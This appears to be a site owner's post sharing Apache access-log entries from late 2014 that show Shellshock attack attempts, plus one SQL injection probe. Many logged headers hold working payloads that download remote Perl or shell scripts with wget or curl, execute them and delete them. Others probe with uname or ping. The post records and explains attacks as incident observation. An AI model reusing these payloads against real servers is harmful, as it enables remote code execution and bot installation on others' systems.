Created
October 12, 2014 19:05
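Shellshock attack attempts I noticed in Apache logs, found with grep '()'. I think I initiated the shellshock-scan one myself, but I think the rest are attack attempts. Note that grep '()' also matches lines that are not Shellshock: the group_concat(...) request is a SQL injection probe, and the two "Mozilla/5.0 ()" requests appear to be ordinary page fetches with an empty-parentheses User-Agent. The Shellshock lines are the ones where a header or the query string starts with "() {". | |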
209.126.230.72 - - [24/Sep/2014:22:55:07 -0400] "GET / HTTP/1.0" 301 - "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" | |
94.228.220.68 - - [25/Sep/2014:01:17:15 -0400] "GET /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,4,5,group_concat(0x3C6B65793E,version(),0x3C6B6579733E)-- HTTP/1.1" 200 31516 "-" "-" | |
89.207.135.125 - - [25/Sep/2014:06:59:58 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 302 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" | |
198.20.69.74 - - [25/Sep/2014:17:14:32 -0400] "GET / HTTP/1.1" 301 - "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69" | |
54.251.83.67 - - [26/Sep/2014:15:55:50 -0400] "GET / HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a" | |
114.91.105.103 - - [27/Sep/2014:09:36:34 -0400] "GET / HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c 'wget http://sts01.com/.../reg.sh -O /tmp/reg.sh && /bin/bash /tmp/reg.sh http://197.242.148.29:8088 66.228.39.121'" | |
188.138.33.11 - - [27/Sep/2014:11:02:02 -0400] "GET /cgi-sys/php5? HTTP/1.1" 404 210 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'" | |
209.222.148.184 - - [28/Sep/2014:18:11:23 -0400] "GET /cgi-sys/php5 HTTP/1.1" 404 210 "-" "() { 0v3r1d3;};echo \"Content-type: text/plain\"; echo; uname -a;" | |
82.221.128.246 - - [29/Sep/2014:02:31:34 -0400] "GET / HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\"" | |
74.112.131.246 - - [01/Oct/2014:22:19:59 -0400] "GET /blog/2009/09/dont-mawk-awk-the-fastest-and-most-elegant-big-data-munging-language/ HTTP/1.1" 200 20457 "-" "Mozilla/5.0 ()" | |
74.112.131.243 - - [01/Oct/2014:22:21:01 -0400] "GET /blog/2009/09/dont-mawk-awk-the-fastest-and-most-elegant-big-data-munging-language/ HTTP/1.1" 200 20456 "-" "Mozilla/5.0 ()" | |
54.213.225.160 - - [02/Oct/2014:17:22:16 -0400] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; HTTP/1.0" 301 233 "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;" "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H;" | |
211.154.173.239 - - [03/Oct/2014:10:06:11 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget https://173.15.111.29/user --no-check-certificate;curl -O https://173.15.111.29/user -k ; perl /tmp/user;rm -rf /tmp/user\"" | |
67.214.182.202 - - [03/Oct/2014:16:54:13 -0400] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /var/tmp/sysinfo https://fs07n5.sendspace.com/dl/09a5e89fc7fadf22dd0318e37132e993/542eb2041a268d57/0r4nfb/sysinfo;chmod +x /var/tmp/sysinfo;/var/tmp/sysinfo HTTP/1.0" 301 233 "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /var/tmp/sysinfo https://fs07n5.sendspace.com/dl/09a5e89fc7fadf22dd0318e37132e993/542eb2041a268d57/0r4nfb/sysinfo;chmod +x /var/tmp/sysinfo;/var/tmp/sysinfo" "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /var/tmp/sysinfo https://fs07n5.sendspace.com/dl/09a5e89fc7fadf22dd0318e37132e993/542eb2041a268d57/0r4nfb/sysinfo;chmod +x /var/tmp/sysinfo;/var/tmp/sysinfo" | |
95.110.178.157 - - [04/Oct/2014:15:45:47 -0400] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi* HTTP/1.0" 301 233 "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi*" "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi*" | |
24.160.166.96 - - [04/Oct/2014:22:52:31 -0400] "GET / HTTP/1.1" 200 31825 "-" "() { :;}; /bin/bash -c \"curl -O http://89.248.172.139/ha.pl -o /tmp/ha.pl; lwp-download -a http://89.248.172.139/ha.pl /tmp/ha.pl;wget http://89.248.172.139/ha.pl -O /tmp/ha.pl;perl /tmp/ha.pl;rm -f /tmp/ha.pl;mkdir /tmp/ha.pl\"" | |
162.144.46.158 - - [05/Oct/2014:06:06:46 -0400] "GET /?x=() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi* HTTP/1.0" 301 233 "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi*" "() { :; }; echo Content-type:text/plain;echo;echo;echo M`expr 1330 + 7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;chmod 755 /tmp/404.cgi;/tmp/404.cgi;rm -rf /tmp/404.cgi*" |